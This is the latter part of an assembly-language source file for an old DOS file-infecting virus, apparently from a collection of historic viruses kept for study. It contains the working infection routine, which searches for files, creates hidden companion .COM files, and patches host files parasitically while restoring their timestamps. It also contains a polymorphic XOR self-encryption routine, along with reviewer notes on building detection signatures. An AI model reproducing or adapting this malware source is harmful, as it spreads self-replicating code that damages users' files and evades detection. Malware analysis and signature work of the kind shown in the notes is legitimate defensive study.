
📄 osp-07s.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use

				; Set DTA address - This is for the Findfirst/Findnext INT 21H functions
	MOV	AH, 1AH
	LEA	DX, VEND
	INT	21H

	MOV	AH, 4EH		; Findfirst
	MOV	CX, 0		; Set normal file attribute search
	MOV	DX, FNAME_OFF
	INT	21H

	JNC	NEXT_LOOP	; if still finding files then loop
	JMP	END_PROG

	NEXT_LOOP :
	CMP	VTYPE, PARASTIC	; parastic infection?
	JE	START_INF	; yes, skip all this

	MOV	AH,47H
	XOR	DL,DL
	LEA	SI,FILE_DIR
	INT	21H

	CMP	WORD PTR VEND[F_SIZEL],0 ; Make sure file isn't 64k+
	JE	OK_FIND		; for spawning infections
	JMP	FIND_FILE

OK_FIND:
	XOR	BX,BX
	LM3	:		; find end of directory name
	INC	BX
	CMP	FILE_DIR[BX],0
	JNE	LM3

	MOV	FILE_DIR[BX],'\' ; append backslash to path
	INC	BX

	MOV	CX,13		; append filename to path
	LEA	SI,VEND[F_NAME]
	LEA	DI,FILE_DIR[BX]
	CLD
	REP	MOVSB

	XOR	BX,BX
	MOV	BX,1EH

	LOOP_ME: 		; search for filename ext.
	INC	BX
	CMP	BYTE PTR VEND[BX], '.'
	JNE	LOOP_ME

	INC	BX		; change it to COM
	MOV	WORD PTR VEND [BX],'OC'
	MOV	BYTE PTR VEND [BX+2],'M'


START_INF:

	CMP	VTYPE, PARASTIC	; parastic infection?
	JE	PARASTIC_INF	; yes.. so jump

;--------------------------------------
; Spawning infection

	LEA	DX, VEND[F_NAME]
	MOV	AH, 3CH		; Create file
	MOV	CX, 02H		; READ-ONLY
	OR	CX, 01H		; Hidden
	INT	21H		; Call INT 21H
	JNC	CONTIN		; If Error-probably already infected
	JMP	NO_INFECT
	CONTIN:

	INC	INF_COUNT
	MOV	BX,AX

	JMP	ENCRYPT_OPS
;----------------------------------------
; Parastic infection

	PARASTIC_INF :

        CMP     VEND[F_SIZEh],400H
        JGE     CONT_INF2
        JMP     NO_INFECT

        CONT_INF2:

        LEA     SI,VEND[F_NAME] ; Is Command.COM?
	LEA	DI,COM_NAME
	MOV	CX,11
	CLD
	REPE	CMPSB

	JNE	CONT_INF0	; Yes, don't infect
	JMP	NO_INFECT

	CONT_INF0:

	MOV	AX,3D02H	; Open file for reading & writing
	LEA	DX,VEND[F_NAME]	; Filename in FF/FN buffer
	INT	21H

	JNC	CONT_INF1	; error, skip infection
	JMP	NO_INFECT

	CONT_INF1:

        
	MOV	BX,AX

	MOV	AH,3FH		; Read first five bytes of file
	MOV	CX,05
	LEA	DX,FIRST_FIVE
	INT	21H

	CMP	WORD PTR FIRST_FIVE,9090H
	JNE	CONT_INF
	MOV	AH,3EH
	INT	21H
	JMP	NO_INFECT

CONT_INF:
        INC     INF_COUNT
        MOV     AX,4202H        ; Set pointer to end of file, so we
	XOR	CX,CX		; can find the file size
	XOR	DX,DX
	INT	21H

				;SUB     AX,0100h          ; Subtract PSP size
        MOV     WORD PTR SET_SI,AX  ; Change the MOV SI inst.
        MOV     WORD PTR ADD_DI,AX  ; ADD DI,xxxx
	MOV	BYTE PTR DI_INS,81H ; ADD DI op

	MOV	AX,4200H
	XOR	CX,CX
	XOR	DX,DX
	INT	21H

	MOV	AX,VEND[F_SIZEH]
	SUB	AX,5
	MOV	WORD PTR NEW_JMP+1,AX


	MOV	AH,40H
	MOV	CX,6
	LEA	DX,NEW_CODE
	INT	21H

	MOV	AX,4202H
	XOR	CX,CX
	XOR	DX,DX
	INT	21H


ENCRYPT_OPS:

;-----------------------------
; Change encryptions ops

	PUSH	BX

	MOV	AX,WORD PTR XCHG_1 ; Switch XCHG_1, and XCHG_2
	MOV	BX,WORD PTR XCHG_2
	MOV	WORD PTR XCHG_1,BX
	MOV	WORD PTR XCHG_2,AX
	MOV	AH, BYTE PTR XCHG_1+2
	MOV	BH, BYTE PTR XCHG_2+2
	MOV	BYTE PTR XCHG_1+2,BH
	MOV	BYTE PTR XCHG_2+2,AH

XOR_DONE:

CHG_TWO:
	XOR	CX,CX		; CX=0
	LEA	DI,SW_BYTE1	; DI->sw_byte1

CHG_REST:
	INC	ROT_NUM		; increment rotation number
	MOV	BX,ROT_NUM	; bx=rotation num
	MOV	AH,OP_SET[BX]	; ah = new op code from set
	MOV	BYTE PTR [DI],AH

	CMP	ROT_NUM,MAX_ROTATION ; max rotation num?
	JNE	CHG_CNT		; no, chg_cnt
	MOV	WORD PTR ROT_NUM,0 ; reset rotation num
CHG_CNT:
	INC	CX		; increment count
	CMP	CX,1
	LEA	DI,M_SW1
	JE	CHG_REST
	CMP	CX,2
	LEA	DI,M_SW2
	JE	CHG_REST
	CMP	CX,3
	LEA	DI,M_SW3
	JE	CHG_REST
	CMP	CX,4
	LEA	DI,SW_BYTE1
	JE	CHG_REST

CHG_THREE:
	XOR	CX,CX
	LEA	DI,SW_BYTE3
CHG_FOUR:
        CMP     BYTE PTR [DI],47H    ;  is first byte (of 3rd) 'INC DI'?
        MOV     BX,1                 ;
        JE      MOV_POS              ;  Yes, so change it to the second
        CMP     BYTE PTR [DI+1],47H  ;  is second byte 'INC DI'
        MOV     BX,2                 ;
        JE      MOV_POS              ;  Yes, change it to the third
        XOR     BX,BX                ;  Else, must be in final position
MOV_POS: MOV    WORD PTR [DI],9090H  ;  set all three bytes (of 3rd)
        MOV     BYTE PTR [DI+2],90H  ;  to NOP
        MOV     BYTE PTR [DI+BX],47H ;  place 'INC DI' in necessary pos.

	CMP	BX,2
	JNE	NO_CHANGE
	INC	CX
	CMP	CX,2
	LEA	DI,SW_BYTE4
	JNE	CHG_FOUR

NO_CHANGE:
	CMP	BYTE PTR TIMES_INC,9
	JE	INC_NUM
	INC	WORD PTR B_WR
	INC	WORD PTR E_JMP
	INC	WORD PTR E_JMP
	INC	TIMES_INC
	JMP	D2
INC_NUM:
	SUB	WORD PTR B_WR,09
	SUB	WORD PTR E_JMP,18
	MOV	TIMES_INC,0

;-----------------------
; Get random XOR number, save it, copy virus, encrypt code

D2:

	MOV	AH,2CH		;
	INT	21H		; Get random number from clock - millisecs

	MOV	WORD PTR XOR_OP+2,DX ; save encryption #


	MOV	SI,0100H
	LEA	DI,VEND+50	; destination 
	MOV	CX,OFFSET VEND-100H ; bytes to move
	CLD
	REP	MOVSB		; copy virus outside of code


	LEA	DI,VEND+ENC_DATA-204 ; offset of new copy of virus
	CMP	BYTE PTR VTYPE, PARASTIC
	JNE	GO_ENC
				;add     di,si

GO_ENC:
	CALL	ENCRYPT		; encrypt new copy of virus

;----------------------------------------
; Write and close new infected file

	POP	BX
	MOV	CX, OFFSET VEND-100H ; # of bytes to write
	LEA	DX, VEND+50	; Offset of buffer
	MOV	AH, 40H		; -- our program in memory
	INT	21H		; Call INT 21H function 40h

        CMP     VTYPE, PARASTIC ; parastic?
        JNE     CLOSE           ; no, don't need to restore date/time

        MOV     AX,5701H          ; Restore data/time
	MOV	CX,VEND[F_TIME]
	MOV	DX,VEND[F_DATE]
	INT	21H


CLOSE:	MOV	AH, 3EH
	INT	21H


NO_INFECT:

; Find next file
	FIND_FILE :

	CMP	INF_COUNT, MAX_INF
	JE	END_PROG
	MOV	AH,4FH
	INT	21H
	JC	END_PROG
	JMP	NEXT_LOOP


	END_PROG:
	EXIT	:
        CMP     INF_COUNT,0     ; Start parastic infection on next run
        JNE     FIND_DONE
        CMP     VTYPE, PARASTIC ; Parastic infection done?
        JE      FIND_DONE       ; yes, we're finished
        MOV     FNAME_OFF, OFFSET FNAME2     ; Point to new filespec
        MOV     VTYPE, PARASTIC              ; virus type = parastic
	JMP	FIND_FIRST


	FIND_DONE:
	MOV	VTYPE,SPAWN
	MOV	FNAME_OFF, OFFSET FNAME1
	RET
RESIDENT ENDP

; END_ENCRYPT is the upper bound of the XOR-encoded region: B_WR (inside
; ENCRYPT) is assembled as (OFFSET END_ENCRYPT - OFFSET ENC_DATA)/2 words.
; Everything from this label onward (OP_SET, ENCRYPT, VEND) lies outside
; that range.
END_ENCRYPT: 			; end of the range covered by the XOR loop
; OP_SET: table of one-byte opcodes. CHG_REST loads OP_SET[ROT_NUM] and
; stores the byte into filler slots (SW_BYTE1, M_SW1..M_SW3), so the filler
; bytes differ from copy to copy. None of the listed opcodes modifies CX or
; DI, the two registers the ENCRYPT loop depends on.
; NOTE(review): for analysis, the filler positions take values only from this
; fixed set, so a byte pattern over the loop can treat those positions as a
; small set match or wildcard rather than as arbitrary data.
OP_SET	DB	90H		; NOP
	DB	40H		; INC AX
	DB	43H		; INC BX
	DB	48H		; DEC AX
	DB	4BH		; DEC BX
	DB	0FBH		; STI
	DB	0FCH		; CLD
	DB	4AH		; DEC DX
	DB	42H		; INC DX
	DB	14 DUP(090H)	; 14 further entries, all NOP
				; NOTE(review): MAX_ROTATION is defined outside this
				; listing; how many entries are reachable is unconfirmed
;------------------------------------------------
; Encrypt/Decrypt Routine
;-----------------------------------------------

;-----------------------------------------------------------------------
; ENCRYPT - word-wise XOR over a buffer; XOR is its own inverse, so the
;           same routine encodes and decodes (see the header above).
; In:    DI = start of the data to transform (the visible caller loads
;             DI with VEND+ENC_DATA-204 before the CALL)
; Out:   DI advanced by 2 per iteration, CX = 0
; Clobb: CX, DI, flags; AX/BX/DX may also change, depending on which
;        OP_SET byte currently sits in a filler slot
;
; The body is patched in place by the caller before use:
;   B_WR      - loop count, adjusted by NO_CHANGE / INC_NUM
;   SW_BYTE1  - filler byte taken from OP_SET by CHG_REST
;   XOR_OP+2  - 16-bit key, overwritten with DX from INT 21h/AH=2Ch
;   SW_BYTE3, SW_BYTE4 - position of INC DI within each 3-byte slot is
;               moved by CHG_FOUR / MOV_POS
; Because of this, exact byte layout matters; do not reorder or resize
; any instruction here when studying the sample.
;
; NOTE(review): the instruction skeleton (MOV CX,imm16 / XOR word [DI],imm16
; / two INC DI / LOOP / RET) stays the same across copies while the count,
; key and filler bytes vary. This routine sits after END_ENCRYPT, i.e.
; apparently outside the XOR-encoded range, which makes it the natural
; anchor for a wildcarded byte signature - confirm against a dumped sample.
;-----------------------------------------------------------------------
ENCRYPT	PROC
CX_M	DB	0B9H		; opcode byte B9h = MOV CX,imm16 (operand follows)
B_WR	DW	(OFFSET END_ENCRYPT-OFFSET ENC_DATA)/2	; imm16: word count of the encoded region
	E2:			; top of the per-word loop
SW_BYTE1: 			; one-byte filler slot; CHG_REST stores an OP_SET byte here
	NOP
XOR_OP:	XOR	WORD PTR [DI],0666H ; XOR current word with key; 0666H is a placeholder
				; replaced at XOR_OP+2 by the clock-derived value
SW_BYTE3: 			; 3-byte slot: one INC DI (47h) + two NOPs, order varies
	INC	DI
	NOP
	NOP
SW_BYTE4: 			; second 3-byte slot, same scheme; the two INC DI
				; together step DI to the next word
	INC	DI
	NOP
	NOP
SW_BYTE2:
	NOP			; filler slot; original note says it takes an OP_SET byte
				; NOTE(review): no write to SW_BYTE2 is visible in this
				; part of the listing - confirm against the first page
	LOOP	E2		; CX = CX - 1; repeat while CX != 0

	RET

ENCRYPT	ENDP

; VEND marks the end of the assembled image; the code uses OFFSET VEND-100H
; as the image length for both the copy and the file write.
; The memory starting here is also used as scratch at run time:
;   - the DTA for INT 21h Findfirst/Findnext is set to VEND (AH=1Ah)
;   - the staging copy that gets written out is built at VEND+50
; so file metadata (VEND[F_NAME], VEND[F_SIZEL], ...) is read from here.
VEND	DW	0		; End of virus

CSEG	ENDS			; close the code segment
	END	START		; program entry point is START (defined outside this listing)
